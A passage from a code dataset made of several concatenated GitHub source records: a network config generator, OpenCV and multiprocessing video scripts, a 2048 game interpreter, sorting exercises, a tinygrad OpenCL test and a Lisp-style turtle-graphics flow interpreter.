else:\n if itens[2] == \"80\":\n a10_vIP_input = f\"gslb service-ip {itens[0]} {itens[1]}\\n port {itens[2]} tcp\\nport 443 tcp\\n!\" \n verifica_vs.append(itens[1])\n elif itens[2] == \"443\":\n a10_vIP_input = f\"gslb service-ip {itens[0]} {itens[1]}\\n port {itens[2]} tcp\\nport 80 tcp\\n!\" \n verifica_vs.append(itens[1])\n else:\n a10_vIP_input = f\"gslb service-ip {itens[0]} {itens[1]}\\n port {itens[2]} tcp\\n!\" \n verifica_vs.append(itens[1])\n vs_limpo.append(itens[0]) \n return a10_vIP_input\n\n\ndef write_site_slb(vs_list, cen_vs, tsm_vs):\n if \"cen-\" in vs_list:\n cen_vs.append(vs_list)\n else:\n tsm_vs.append(vs_list)\n \nverifica_vIPs = []\n\n\nvs_info = []\nfor lines in norm_file:\n print(write_vIPs(lines,verifica_vIPs,vs_info))\n \nprint(\"-------------------------------SITE-SLB------------------------\")\n\ncen_vs= []\ntsm_vs= []\nfor lines in vs_info:\n write_site_slb(lines, cen_vs, tsm_vs)\n\nline_server=\"\"\nstring_site=\"\"\nfor i in cen_vs:\n line_server = f\"{line_server}vip-server {i}\\n\"\n string_site = f\"gslb site CENESP\\n slb-dev SLB-CEN 192.168.15.200\\n {line_server}\"\nprint (string_site)\n\n\ntsm_line_server=\"\"\ntsm_string_site=\"\"\nfor i in tsm_vs:\n tsm_line_server = f\"{tsm_line_server}vip-server {i}\\n\"\n tsm_string_site = f\"gslb site TRANSAMERICA\\n slb-dev SLB-TSM 192.168.15.200\\n {tsm_line_server}\"\nprint (tsm_string_site)\n","repo_name":"RcostaFranca/python-scripts","sub_path":"A10-scripts/GTM-scripts/configServiceIP.py","file_name":"configServiceIP.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4219589390","text":"import cv2 as cv\r\n\r\ncapture=cv.VideoCapture(0)\r\n\r\ndef rescaleFrame(frame,scale=0.5): #will work for all: videos,images,live videos\r\n width=int(frame.shape[1]*scale)\r\n height=int(frame.shape[0]* scale)\r\n\r\n dimension=(width,height)\r\n\r\n return cv.resize(frame,dimension,interpolation=cv.INTER_AREA)\r\n\r\nwhile True:\r\n isTrue,frame=capture.read()\r\n rescaled_frame=rescaleFrame(frame)\r\n\r\n cv.imshow('Video',frame)\r\n cv.imshow('Rescaled Video',rescaled_frame)\r\n\r\n if cv.waitKey(20) and 0xFF==ord('d'):\r\n break\r\n\r\ncapture.release()\r\ncv.destroyAllWindows()\r\n","repo_name":"amitk29/OpenCV_tutorial_basics","sub_path":"rescale.py","file_name":"rescale.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23061532929","text":"# encoding:utf-8\nimport threading\nimport time\n\n\nclass MyThread(threading.Thread):\n\n def __init__(self,name,age):\n super().__init__()\n self.name = name\n self.age = age\n\n def run(self):\n print(f\"Hi {self.name}, good day today, we love {self.age} you\")\n time.sleep(5)\n\n\n\n\nif __name__ == '__main__':\n t1 = MyThread('lzk','25')\n t2 = MyThread('lbq','25')\n t1.start()\n t2.start()\n print(threading.enumerate())","repo_name":"Lzk-1/Learning_materials","sub_path":"01Python编程/01进程线程协程/01代码/04test.py","file_name":"04test.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23583347321","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\n#!/usr/bin/env python\nimport sys\nimport random\nimport numpy as np\nfrom time import time\nimport math\n\n\ndef color(x):\n\tif x == 0:\n\t\treturn \"R\"\n\tif x == 1:\n\t\treturn \"O\"\n\tif x == 2:\n\t\treturn \"Y\"\n\tif x == 3:\n\t\treturn \"G\"\n\tif x == 4:\n\t\treturn \"B\"\n\tif x == 5:\n\t\treturn \"V\"\n\ndef repair(colors,N):\n\tif colors[0] != colors[N-1]:\n\t\treturn colors\n\ttofix = list(colors)\n\ttemp = tofix[N-2]\n\ttofix[N-2] = tofix[N-1]\n\ttofix[N-1] = temp\n\tcurrIndex = N-2\n\twhile currIndex > 1 and tofix[currIndex] == tofix[currIndex-1]:\n\t\ttemp = tofix[currIndex-2]\n\t\ttofix[currIndex-2] = tofix[currIndex-1]\n\t\ttofix[currIndex-1] = temp\n\t\tcurrIndex = currIndex-2\n\tfixedFlag = True\n\tfor i in range(N-1):\n\t\tif tofix[i] == tofix[i+1]:\n\t\t\tfixedFlag = False\n\tif tofix[0] == tofix[N-1]:\n\t\tfixedFlag = False\n\tif fixedFlag == True:\n\t\treturn(''.join(tofix))\n\telse:\n\t\treturn(\"IMPOSSIBLE\")\n\n\n\nT = int(raw_input().strip())\nfor n in range(T):\n\tcase = list(map(int,raw_input().strip().split(' ')))\n\tN = case[0]\n\ttoPlace = case[1:]\n\tprevColor = -1\n\toutput = \"\"\n\tbadFlag = False\n\tfor i in range(6):\n\t\tif toPlace[i] > N/2:\n\t\t\tbadFlag = True\n\tif badFlag == False:\n\t\tfor i in range(N):\n\t\t\tmaxIndex = -1\n\t\t\tfor k in range(6):\n\t\t\t\tif k != prevColor:\n\t\t\t\t\tif maxIndex < 0:\n\t\t\t\t\t\tmaxIndex = k\n\n\t\t\t\t\telif toPlace[k] > toPlace[maxIndex]:\n\t\t\t\t\t\tmaxIndex = k\n\t\t\toutput = output + color(maxIndex)\n\t\t\ttoPlace[maxIndex] -= 1\n\t\t\tprevColor = maxIndex\n\n\t\toutput = repair(str(output),N)\n\t\tprint(\"Case #\" + str(n+1) + \": \" + str(output))\n\telse:\n\t\tprint(\"Case #\" + str(n+1) + \": IMPOSSIBLE\")","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_207/452.py","file_name":"452.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6997487893","text":"import cv2 \nimport os\nimport time\nimport multiprocessing as mp\n\ndef read_video(video_path):\n video = cv2.VideoCapture(video_path)\n video_name = video_path.split('/')[-1][:-4]\n print(f'{video_name} are cpatured')\n \n if not os.path.exists(f'data/{video_name}'):\n os.mkdir(f'data/{video_name}')\n\n # frame \n currentframe = 0\n while(True): \n # reading from frame \n ret, frame = video.read()\n # ret代表成功與否(True 代表成功,False 代表失敗), frame 就是攝影機的單張畫面\n if ret: \n # if video is still left continue creating images \n frame_name = currentframe\n if frame_name < 10:\n name = f'./data/{video_name}/frame' + '000' + str(currentframe) + '.jpg'\n cv2.imwrite(name, frame) \n currentframe += 1\n elif frame_name < 100:\n name = f'./data/{video_name}/frame' + '00' + str(currentframe) + '.jpg'\n cv2.imwrite(name, frame) \n currentframe += 1\n elif frame_name < 1000:\n name = f'./data/{video_name}/frame' + '0' + str(currentframe) + '.jpg'\n cv2.imwrite(name, frame) \n currentframe += 1\n else:\n name = f'./data/{video_name}/frame' + str(currentframe) + '.jpg'\n cv2.imwrite(name, frame) \n currentframe += 1\n else: \n break\n \n # Release all space and windows once done \n video.release() \n cv2.destroyAllWindows() \n\nif __name__ == \"__main__\":\n start_time = time.time()\n video_par_path = '/home/rico-li/Job/豐興鋼鐵/high_quality_video'\n video_dirs = os.listdir(video_par_path)\n video_dirs = [os.path.join(video_par_path, video_dir) for video_dir in video_dirs if video_dir.split('/')[-1] != '.DS_Store']\n video_paths = [os.path.join(video_dir, video_path) for video_dir in video_dirs for video_path in os.listdir(video_dir)]\n video_count = len(video_paths)\n print(f'there are {video_count} videos')\n print(f'has {os.cpu_count()} cpus')\n \n try: \n if not os.path.exists('data'): \n os.makedirs('data')\n except OSError: \n print ('Error: Creating directory of data') \n\n video_idx = 0\n counts = video_count//os.cpu_count()\n left = video_count%os.cpu_count()\n now = video_count\n for _ in range(counts+1):\n processes = []\n if now >= os.cpu_count():\n for _ in range(os.cpu_count()):\n p = mp.Process(target=read_video, args=[video_paths[video_idx]])\n p.start()\n processes.append(p)\n video_idx += 1\n for process in processes:\n process.join()\n else:\n for _ in range(left):\n p = mp.Process(target=read_video, args=[video_paths[video_idx]])\n p.start()\n processes.append(p)\n video_idx += 1\n for process in processes:\n process.join()\n now -= os.cpu_count()\n print(f'\\n--- spend {time.time() - start_time:.2f} sec ---\\n')\n\n \n","repo_name":"RicoSuaveGuapo/yolact_curvature_detection","sub_path":"video2image.py","file_name":"video2image.py","file_ext":"py","file_size_in_byte":3165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27314288426","text":"import game_funcs\nfrom collections import defaultdict\nimport sys\nimport numpy as np\n\nclass driver():\n def __init__(self):\n self.commands = [\"a\",\"w\",\"d\",\"s\"]\n self.init_matrix()\n self.curr=True\n self.names=np.array([[\"\" for _ in range(4)] for _ in range(4)],dtype='object')\n #print(self.names)\n # print(len(self.names))\n \n def init_matrix(self):\n self.matrix = game_funcs.start_game()\n\n def draw_matrix(self):\n print('Current Matrix is:')\n for i in range(4):\n for j in range(4):\n print(self.matrix[i][j],end=\" \")\n print(\"\")\n print(\"\")\n \n def key_press(self,key,op):\n if key in self.commands:\n # print(self.names)\n x=key\n if(x==\"w\" or x==\"W\"):\n self.matrix, move_made, sc,self.names= game_funcs.move_up(self.matrix,op,self.names)\n if(x==\"s\" or x==\"S\"):\n self.matrix, move_made, sc ,self.names = game_funcs.move_down(self.matrix,op,self.names)\n if(x==\"A\" or x==\"a\"):\n self.matrix, move_made, sc ,self.names= game_funcs.move_left(self.matrix,op,self.names)\n if(x==\"d\" or x==\"D\"):\n self.matrix, move_made, sc ,self.names= game_funcs.move_right(self.matrix,op,self.names)\n if move_made:\n self.matrix = game_funcs.add_new_tile(self.matrix)\n move_made = False\n # print(self.names)\n self.draw_matrix()\n \n def key_press_2(self,p,q,num):\n if p>3 or q>3:\n print(\"Out of Bounds\")\n return\n else:\n game_funcs.add_num_tile(self.matrix,p,q,num)\n print('Value added')\n self.draw_matrix()\n\n def key_press_3(self,p,q):\n if p>3 or q>3:\n print(\"Out of Bounds\")\n return\n print(game_funcs.what_value(self.matrix,p,q))\n\n def key_press_4(self,p,q,name):\n #print(p,q,name)\n self.names[p][q]=self.names[p][q]+name\n\nDriver=driver()\nDriver.draw_matrix()\n\nclass MyExecute:\n \n def __init__(self, tree, env):\n self.env = env\n self.bool=True\n if not any(0 in row for row in Driver.matrix) and not game_funcs.horizontal_move_exists(Driver.matrix) and not game_funcs.vertical_move_exists(Driver.matrix):\n Driver.draw_matrix()\n print(\"Game Over\")\n print(\"Thank you for playing the game\")\n exit()\n result = self.walkTree(tree)\n if self.bool==False:\n #print(\"It's true\")\n for i in range(4):\n for j in range(4):\n print(Driver.matrix[i][j],end=\" \",file=sys.stderr)\n for i in range(4):\n for j in range(4):\n if len(Driver.names[i][j])!=0:\n g=str(i)\n f=str(j)\n h=''\n for m in range(len(Driver.names[i][j])):\n h=h+Driver.names[i][j][m]\n print(g+','+f+h,end=\" \",file=sys.stderr)\n print(\"\",file=sys.stderr)\n if result is not None and isinstance(result, int):\n print(result)\n if isinstance(result, str) and result[0] == '\"':\n print(result)\n # print(\"hey\")\n\n def walkTree(self, node):\n \n if isinstance(node, int):\n return node\n if isinstance(node, str):\n return node\n \n if node is None:\n return None\n \n if node[0] == 'num':\n return node[1]\n \n if node[0] == 'str':\n return node[1]\n \n if node[0] == 'add_up':\n Driver.key_press('w','+')\n if node[0] == 'add_down':\n Driver.key_press('s','+')\n if node[0] == 'add_left':\n Driver.key_press('a','+')\n if node[0] == 'add_right':\n Driver.key_press('d','+')\n if node[0] == 'sub_up':\n Driver.key_press('w','-')\n if node[0] == 'sub_down':\n Driver.key_press('s','-')\n if node[0] == 'sub_left':\n Driver.key_press('a','-')\n if node[0] == 'sub_right':\n Driver.key_press('d','-')\n if node[0] == 'mult_up':\n Driver.key_press('w','*')\n if node[0] == 'mult_down':\n Driver.key_press('s','*')\n if node[0] == 'mult_left':\n Driver.key_press('a','*')\n if node[0] == 'mult_right':\n Driver.key_press('d','*')\n if node[0] == 'div_up':\n print(\"hello\")\n Driver.key_press('w','/')\n if node[0] == 'div_down':\n print('hello2')\n Driver.key_press('s','/')\n if node[0] == 'div_left':\n print('hello3')\n Driver.key_press('a','/')\n if node[0] == 'div_right':\n print(hello4)\n Driver.key_press('d','/')\n if node[0] == 'var':\n Driver.key_press_4(node[2],node[3],node[1])\n if node[0] == 'assign':\n Driver.key_press_2(node[2],node[3],node[1])\n if node[0] == 'value':\n Driver.key_press_3(node[1],node[2])\n else:\n self.bool=False","repo_name":"Shanmukh45/2048-lexer-game","sub_path":"execute_2048.py","file_name":"execute_2048.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31833598846","text":"# Исходные данные:\nimport re\nimport random\nimport math\nfrom typing import List\n\nspisok_c = list(range(0, 1000000)) # список целых чисел\nprint(\"1.Cписок целых чисел от 0 до 999999:\", spisok_c)\n\n\n\nspisok_v = []\nfor i in range(99999):\n spisok_v.append(random.uniform(-1, 1)) # список вещественных чисел в диапазоне\nprint(\"2.Список из 99999 случайных вещественных чисел в диапазоне [-1, 1]:\", spisok_v)\n\nbirth_day = 24\nbirth_month = 11\nr = birth_day / birth_month\nspisok = [] # итоговый список\nbirth_day = 24\nbirth_month = 11\nr = birth_day / birth_month # радиус окружности\n\n\n\nfor i in range(56000):\n x = random.uniform(-r, r)\n y = random.uniform(-r, r)\n hypotenuse = math.sqrt(x ** 2 + y ** 2)\n if hypotenuse <= r:\n spisok.append(complex(x, y))\n if len(spisok) == 42000:\n break\nprint(\"3.42000 разных точки комплексной плоскости, лежащие на окружности радиуса:\", spisok)\n\nwith open(\"text.txt\", \"r\", encoding=\"utf8\") as file:\n text = file.read()\n text = re.sub(\"[^a-zA-Zа-яА-Я]\", \" \", text)\n words = text.split()\nprint(\"4.Отрывок из книги:\", words)\n\n\nsortirovka = [4, 10, 8, 2]\nprint(sortirovka)\n\n#4.Сортировка insertion sort\ndef insertionSort(spisok_c):\n for i in range(len(spisok_c)):\n current_value=spisok_c[i]\n position=i\n while position > 0 and spisok_c[position-1] > current_value:\n spisok_c[position]=spisok_c[position - 1]\n position -=1\n spisok_c[position]=current_value\n return spisok_c\n\nresult=insertionSort(spisok_c)\n\n\n# 10.Сортировка Quicksort\ndef quicksort(spisok_v):\n if len(spisok_v) <= 1:\n return spisok_v\n pivot = spisok_v[len(spisok_v) // 2]\n left = [x for x in spisok_v if x < pivot]\n middle = [x for x in spisok_v if x == pivot]\n right = [x for x in spisok_v if x > pivot]\n return quicksort(left) + middle + quicksort(right)\n\n#8. Сортировка selection sort\n\ndef selectionSort(arr):\n a = len(arr)\n for i in range(a):\n min = i\n for j in range(i+1, a):\n if abs(arr[j]) < abs(arr[min]):\n min = j\n arr[i], arr[min] = arr[min], arr[i]\n return arr\n\n# 2.Сортировка bubble sort\ndef bubble_sort(words):\n n = len(words)\n for w in range(n):\n for j in range(n - w - 1):\n if words[j] > words[j + 1]:\n words[j], words[j + 1] = words[j + 1], words[j] # Меняем элементы местами\n \nbubble_sort(words)\n\n\n\n\n\n\n\n\n\n\n\nprint(\"Отсортированный массив по insertionsort: \", result)\nprint(\"Отсортированный массив по Quicksort:\", quicksort(spisok_v))\nprint(\"Отсортированный массив по selection sort:\", selectionSort(spisok))\nprint(\"Отсортированный массив по bubble sort:\", ' '.join(words))\n\n\n","repo_name":"kit8nino/2023-python","sub_path":"ИС-33/Коротаев Александр/lab2/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"ru","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"21771774892","text":"from tinygrad.runtime.ops_gpu import CLDevice, CLProgram, compile_cl\n\nif __name__ == \"__main__\":\n dev = CLDevice()\n lib = compile_cl(\"\"\"\n#pragma OPENCL EXTENSION cl_khr_fp16 : enable\n__kernel void test(__global half *out, __global half *a, __global half *b) {\n int gid = get_global_id(0);\n out[gid] = max(a[gid], b[gid]);\n}\n\"\"\")\n prg = CLProgram(dev, \"test\", lib)\n\n","repo_name":"tinygrad/tinygrad","sub_path":"test/external/external_cl_half_max.py","file_name":"external_cl_half_max.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":20676,"dataset":"github-code","pt":"61"} +{"seq_id":"2720210229","text":"# From Peter Norvig's (How to Write a (Lisp) Interpreter (in Python))\n# https://norvig.com/lang.html\n# https://norvig.com/lis.py\nimport json\nimport logging\nimport math\nimport operator as op\nimport os\nimport random\nfrom datetime import datetime\n\nimport flatland.utils.config as CONFIG\nfrom flatland.library import check_internal_dir\nfrom flatland.utils.randomizer import GENERATE_NODEID\nfrom flatland.utils.randomizer import get_randomizer\n\nlogger = logging.getLogger(\"flatland.lang.primitives\")\n\n\ndef isconst(x):\n if isinstance(x, int) or isinstance(x, Number):\n return True\n return False\n\n\nclass Symbol(str):\n pass\n\n\nclass Number(float):\n pass\n\n\nclass List(list):\n def __str__(self):\n if len(self) == 0:\n return \"()\"\n else:\n ans = \"(\" + str(self[0])\n if len(self) > 1:\n ans += \" \"\n ans += \" \".join(str(x) for x in self[1:])\n ans += \")\"\n return ans\n\n\nclass Env(dict):\n \"An environment: a dict of {'var': val} pairs, with an outer Env.\"\n\n def __init__(self, parms=(), args=(), outer=None):\n self.update(zip(parms, args))\n self.outer = outer\n self.name = GENERATE_NODEID()\n\n def find(self, var):\n \"Find the innermost Env where var appears.\"\n if var in self:\n return self\n elif self.outer is not None:\n return self.outer.find(var)\n else:\n raise AttributeError(f\"Unable to find {var}\")\n\n\nclass Procedure:\n \"A user-defined Scheme procedure.\"\n\n def __init__(self, parms, body, env):\n self.parms, self.body, self.env = parms, body, env\n\n def __call__(self, *args):\n return evalf(self.body, Env(self.parms, args, self.env))\n\n\nAtom = (Symbol, Number)\nExp = (Atom, List)\n\n\ndef validate_message(callmethod):\n def wrapper(self, data0):\n if data0.get(\"position\", None):\n CONFIG.TURTLE.moveto(data0[\"position\"])\n if data0.get(\"theta\", None) is not None:\n CONFIG.TURTLE.setheading(data0[\"theta\"])\n # python objects are by reference\n # but we need a copy of data to avoid overwrites\n # so copy the dictionary\n data = dict(**data0)\n return callmethod(self, data)\n return []\n\n return wrapper\n\n\nclass Node(Procedure):\n tp = \"\"\n\n def __init__(self, name, parent_env):\n super().__init__((), (), Env((), (), parent_env))\n self.name = name\n self.sources = []\n self.targets = {\"out\": []}\n\n def forward(self, outdata):\n outdata[\"position\"] = CONFIG.TURTLE.position()\n outdata[\"theta\"] = CONFIG.TURTLE.heading()\n results = []\n for i, nodename in enumerate(self.targets[\"out\"]):\n results.append((self.name, nodename, outdata))\n return results\n\n @validate_message\n def __call__(self, data):\n return self.forward(data)\n\n @property\n def id(self):\n return self.env.name\n\n @property\n def parameters(self):\n raise NotImplementedError()\n\n def to_dict(self):\n outer = self.env.outer\n return {\n \"name\": self.name,\n \"id\": self.env.name,\n \"type\": self.tp,\n \"scope\": outer.name,\n \"sources\": [outer[x].id for x in self.sources],\n \"targets\": {k: [outer[x].id for x in v] for k, v in self.targets.items()},\n }\n\n def __repr__(self):\n return json.dumps(self.to_dict(), indent=2)\n\n def __random_details__(self):\n raise NotImplementedError()\n\n\nclass LoopNode(Node):\n randomizer = get_randomizer(\"int\", [1, 360])\n tp = \"loop\"\n\n def __init__(self, name, varname, start, end, parent_env):\n super().__init__(name, parent_env)\n self.start = evalf(start, self.env)\n self.end = evalf(end, self.env)\n self.varname = varname\n self.resolved_name = f\"{self.env.name}:{self.varname}\"\n self.targets[\"body\"] = []\n\n if CONFIG.RANDOMIZE and CONFIG.RUN and parent_env.outer.name == \"__global__\":\n if isconst(end) and isconst(start):\n self.start = 0\n self.end = self.randomizer()\n end = self.end\n start = self.start\n logger.info(f\"randomizing end for {self.name}: {self.end}\")\n\n @property\n def parameters(self):\n return self.varname, self.start, self.end\n\n def forward(self, outdata):\n outdata[\"position\"] = CONFIG.TURTLE.position()\n outdata[\"theta\"] = CONFIG.TURTLE.heading()\n results = []\n in_loop = outdata[self.resolved_name] < self.end\n targets = self.targets[\"body\"] if in_loop else self.targets[\"out\"]\n if not in_loop:\n outdata.pop(self.resolved_name)\n for i, nodename in enumerate(targets):\n results.append((self.name, nodename, outdata))\n return results\n\n @validate_message\n def __call__(self, data):\n data[self.resolved_name] = data.get(self.resolved_name, self.start - 1)\n if data[self.resolved_name] < self.end:\n data[self.resolved_name] = data[self.resolved_name] + 1\n return self.forward(data)\n\n def to_dict(self):\n a = super().to_dict()\n a[\"params\"] = dict(start=self.start, end=self.end, varname=self.varname)\n return a\n\n def __random_details__(self):\n return {\n \"function\": self.tp,\n \"properties\": [\"start\", \"end\", \"varname\"],\n \"path\": None,\n \"rules\": {\"end\": self.randomizer.to_dict()},\n }\n\n\nclass MoveNode(Node):\n dist_randomizer = get_randomizer(\"float\", [0, 60])\n penup_randomizer = get_randomizer(\"bool\", 0.1)\n tp = \"move\"\n\n def __init__(self, name, dist, penup, parent_env):\n super().__init__(name, parent_env)\n self.dist = evalf(dist, self.env)\n self.penup = bool(evalf(penup, self.env))\n\n if CONFIG.RANDOMIZE and CONFIG.RUN and parent_env.outer.name == \"__global__\":\n if isconst(dist):\n self.dist = self.dist_randomizer()\n logger.info(f\"randomizing dist for {self.name}: {self.dist}\")\n dist = self.dist\n if isconst(penup):\n self.penup = self.penup_randomizer()\n logger.info(f\"randomizing penup for {self.name}: {self.penup}\")\n penup = self.penup\n\n @validate_message\n def __call__(self, data):\n if self.penup:\n CONFIG.TURTLE.penup()\n CONFIG.TURTLE.forward(self.dist)\n if self.penup:\n CONFIG.TURTLE.pendown()\n return self.forward(data)\n\n @property\n def parameters(self):\n return self.dist, int(self.penup)\n\n def to_dict(self):\n a = super().to_dict()\n a[\"params\"] = dict(dist=self.dist, penup=self.penup)\n return a\n\n def __random_details__(self):\n return {\n \"function\": self.tp,\n \"properties\": [\"dist\", \"penup\"],\n \"path\": None,\n \"rules\": {\n \"dist\": self.dist_randomizer.to_dict(),\n \"penup\": self.penup_randomizer.to_dict(),\n },\n }\n\n\nclass TurnNode(Node):\n randomizer = get_randomizer(\"int\", [0, 360])\n tp = \"turn\"\n\n def __init__(self, name, theta, parent_env):\n super().__init__(name, parent_env)\n self.theta = evalf(theta, self.env)\n if CONFIG.RANDOMIZE and CONFIG.RUN and parent_env.outer.name == \"__global__\":\n if isconst(theta):\n self.theta = self.randomizer()\n logger.info(\"randomizing theta for {self.name}: {self.theta}\")\n theta = self.theta\n\n @validate_message\n def __call__(self, data):\n CONFIG.TURTLE.left(self.theta)\n return self.forward(data)\n\n @property\n def parameters(self):\n return (self.theta,)\n\n def to_dict(self):\n a = super().to_dict()\n a[\"params\"] = dict(theta=self.theta)\n return a\n\n @classmethod\n def __random_details__(self):\n return {\n \"function\": self.tp,\n \"properties\": [\"theta\"],\n \"path\": None,\n \"rules\": {\"theta\": self.randomizer.to_dict()},\n }\n\n\nclass Flow(Node): # brain hurty\n tp = \"flow\"\n\n class Internal:\n def __init__(self, _id):\n self.entries = set()\n self.exits = dict()\n self.messages = dict()\n self.id = _id\n\n def add_entry(self, node):\n self.entries.add(node)\n\n def add_exit(self, node, port):\n if port not in self.exits:\n self.exits[port] = []\n self.messages[port] = []\n self.exits[port].append(node)\n\n def add_message(self, data, node):\n for port, names in self.exits.items():\n if node in names:\n self.messages[port].append(data)\n\n def __call__(self, data, node):\n self.add_message(data, node)\n return []\n\n def to_dict(self, env):\n return {\n \"entries\": list(env[x].id for x in self.entries),\n \"exits\": {k: [env[x].id for x in v] for k, v in self.exits.items()},\n }\n\n def clear(self):\n for k, v in self.messages.items():\n v.clear()\n\n def __init__(self, name, creator, filename, tp, params, opts, body, parent_env):\n super().__init__(name, parent_env)\n optvals = [evalf(x, self.env) for x in opts]\n self.env.update(zip(params, optvals))\n self.creator = creator\n self.filename = filename\n self.flowtype = tp\n self.body = body\n self.internal = Flow.Internal(self.id)\n self.params = params\n self.env[\"__internal__\"] = self.internal\n\n @property\n def parameters(self):\n return tuple(self.env[k] for k in self.params)\n\n def install(self):\n for expr in self.body:\n evalf(expr, self.env)\n\n def __call__(self, data):\n messages = [(\"__internal__\", snode, data) for snode in self.internal.entries]\n while len(messages) > 0:\n msg = messages.pop(0)\n fnode, tnode, data = msg\n if tnode == \"__internal__\":\n self.internal(data, fnode)\n elif data:\n results = self.env[tnode](data)\n messages.extend(results)\n if self.env.outer.name == \"__global__\":\n logger.info(f\"Processing: {msg}\")\n logger.info(f\"yet to process: {messages}\\n\")\n return self.forward(None)\n\n def forward(self, data):\n results = []\n for k in self.targets:\n for nodename in self.targets[k]:\n for xdata in self.internal.messages[k]:\n results.append((self.name, nodename, dict(**xdata)))\n self.internal.clear()\n return results\n\n def to_dict(self):\n a = super().to_dict()\n a[\"__internal__\"] = self.internal.to_dict(self.env)\n a[\"params\"] = {x: self.env[x] for x in self.params}\n a[\"flowtype\"] = self.flowtype\n a[\"filename\"] = self.filename\n nodes = [a]\n for k, obj in self.env.items():\n if isinstance(obj, Node):\n info = obj.to_dict()\n if isinstance(info, list):\n nodes.extend(info)\n elif isinstance(info, dict):\n nodes.append(info)\n else:\n raise TypeError(\"invalid nodeinfo type: \" + str(type(info)))\n return nodes\n\n def __repr__(self):\n return json.dumps(self.to_dict(), indent=2)\n\n def __random_details__(self):\n return self.creator.__random_details__()\n\n\nclass FlowCreator:\n def __init__(self, tp, params, randoms, body, filename):\n self.flowtype = tp\n self.params = list(params)\n self.randoms = randoms\n self.rfuncs = {k: get_randomizer(v) for k, v in randoms.items()}\n self.body = body\n self.filename = filename\n\n def __call__(self, name, opts, parent_env):\n if CONFIG.RANDOMIZE and self.randoms:\n new_opts = []\n for i, x in enumerate(opts):\n if not isconst(x):\n new_opts.append(x)\n else:\n opt = self.rfuncs[self.params[i]]()\n logger.info(f\"randomizing {self.params[i]} for {name} {opt}\")\n new_opts.append(opt)\n else:\n new_opts = opts\n flow = Flow(\n name,\n self,\n self.filename,\n self.flowtype,\n self.params,\n new_opts,\n self.body,\n parent_env,\n )\n flow.install()\n return flow\n\n def __random_details__(self):\n return {\n \"function\": self.flowtype,\n \"properties\": self.params,\n \"path\": self.filename,\n \"rules\": {k: v.to_dict() for k, v in self.rfuncs.items()},\n }\n\n\ndef check_acyclic(flowenv, fromname, toname):\n if fromname in flowenv[toname].targets:\n return False\n for n2 in flowenv[toname].targets:\n if not check_acyclic(flowenv, fromname, n2):\n return False\n return True\n\n\ndef node_creator(env, name, tp, *args):\n if env.get(name):\n raise ValueError(f\"node name {name} already exists\")\n if tp == \"loop\":\n node = LoopNode(name, *args, env)\n elif tp == \"move\":\n node = MoveNode(name, *args, env)\n elif tp == \"turn\":\n node = TurnNode(name, *args, env)\n elif isinstance(env.find(tp)[tp], FlowCreator):\n fc = env.find(tp)[tp]\n node = fc(name, args, env)\n else:\n raise TypeError(f\"invalid node type {tp}\")\n\n return node\n\n\ndef split_node_port(z, src=True):\n a = z.split(\":\")\n default = \"out\" if src else \"in\"\n if len(a) >= 2:\n return a[0], a[1]\n elif len(a) == 1:\n return a[0], default\n else:\n raise ValueError(f\"invalid port {z}\")\n\n\ndef link_creator(env, fnp, tnp):\n fnode, fport = split_node_port(fnp, src=True)\n tnode, tport = split_node_port(tnp, src=False)\n # print((fnode, fport), (tnode, tport))\n # print(env)\n # assert check_acyclic(\n # env, fromnode, tonode\n # ), f\"{fromnode} -> {tonode} causes loop in Flow\"\n env[fnode].targets[fport].append(tnode)\n env[tnode].sources.append(fnode)\n\n\ndef create_exit(env, np, ports):\n if ports:\n port = ports[0]\n else:\n port = \"out\"\n node, nport = split_node_port(np)\n env[\"__internal__\"].add_exit(node, port)\n env[node].targets[port].append(\"__internal__\")\n\n\ndef run_flow(env, flowname, rest):\n d = env[flowname]\n if isinstance(d, FlowCreator):\n opts, pos, theta = rest\n bname = os.path.basename(d.filename)\n flowname = f\"__{bname}:{d.flowtype}__\"\n flow = d(flowname, opts, env)\n env[flow.name] = flow\n elif isinstance(d, Flow):\n flow = d\n else:\n raise TypeError(f\"cannot create flow from {flowname}\")\n\n if CONFIG.RUN and CONFIG.RANDOMIZE:\n pos = (pos[0] + MoveNode.dist_randomizer(), pos[1] + MoveNode.dist_randomizer())\n pos = (pos[0] % 128, pos[1] % 128)\n theta = TurnNode.randomizer()\n\n data = dict()\n data[\"params\"] = dict(position=List(pos), theta=theta)\n if CONFIG.RUN:\n flow(data[\"params\"])\n # print(flow)\n return flow, data\n\n\ndef format_static(flow, data):\n data[\"id\"] = \"__START__\"\n data[\"type\"] = \"info\"\n data[\"targets\"] = dict(out=[flow.id])\n data[\"sources\"] = []\n data[\"scope\"] = \"__global__\"\n data[\"name\"] = \"START\"\n fdata = flow.to_dict()\n for x in fdata:\n if x[\"name\"] == flow.name:\n x[\"sources\"].append(data[\"id\"])\n fdata.insert(0, data)\n return fdata\n\n\ndef resolve_scope(fdata):\n flow = {x[\"id\"]: x for x in fdata}\n subflows = [x for x in fdata if x[\"type\"] == \"flow\"]\n for sf in subflows:\n # for every subflow sf\n\n # we need to connect its internal entry nodes to its sources\n for dst_id in sf[\"__internal__\"][\"entries\"]:\n dst = flow[dst_id]\n dst[\"sources\"].remove(sf[\"id\"])\n for src_id in sf[\"sources\"]:\n src = flow[src_id]\n for k, v in src[\"targets\"].items():\n # a particular node can only be in one target location\n # so check and break if found\n if sf[\"id\"] in v:\n v.remove(sf[\"id\"])\n v.append(dst_id)\n break\n 